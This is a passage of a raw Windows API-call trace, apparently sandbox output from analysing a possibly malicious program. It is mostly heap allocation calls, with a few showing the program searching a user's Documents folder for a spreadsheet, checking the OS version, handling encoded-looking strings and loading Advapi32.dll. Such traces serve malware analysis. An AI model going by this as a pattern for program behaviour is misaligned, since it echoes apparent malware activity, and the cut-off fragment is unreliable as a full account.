lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0262.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0262.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0262.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.671] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/icIcTV1 eT9I1Qro.xlsx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc74dee10, ftCreationTime.dwHighDateTime=0x1d4e7bf, ftLastAccessTime.dwLowDateTime=0x93517fe0, ftLastAccessTime.dwHighDateTime=0x1d4d050, ftLastWriteTime.dwLowDateTime=0x93517fe0, ftLastWriteTime.dwHighDateTime=0x1d4d050, nFileSizeHigh=0x0, nFileSizeLow=0x67e9, dwReserved0=0xb270047, dwReserved1=0x249ae, cFileName="icIcTV1 eT9I1Qro.xlsx", cAlternateFileName="ICICTV~1.XLS")) returned 0xaa59a0 [0262.671] FindClose (in: hFindFile=0xaa59a0 | out: hFindFile=0xaa59a0) returned 1 [0262.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.672] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0262.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0262.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.674] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.674] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0262.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.674] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.674] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0262.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.674] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0262.675] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.675] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.675] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.675] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.676] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 1 [0262.676] TranslateMessage (lpMsg=0x8bf0b0) returned 0 [0262.676] DispatchMessageW (lpMsg=0x8bf0b0) returned 0x0 [0262.676] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0262.676] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0262.676] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0262.676] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0262.678] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0262.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0262.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.679] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0262.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.680] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.680] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.680] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0262.680] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.681] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0262.681] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.681] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.681] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.681] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.681] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.682] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.682] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0262.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0262.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.682] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0262.682] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.683] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.683] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0262.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.683] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.683] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0262.684] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0262.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.684] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.684] RtlAllocateHeap 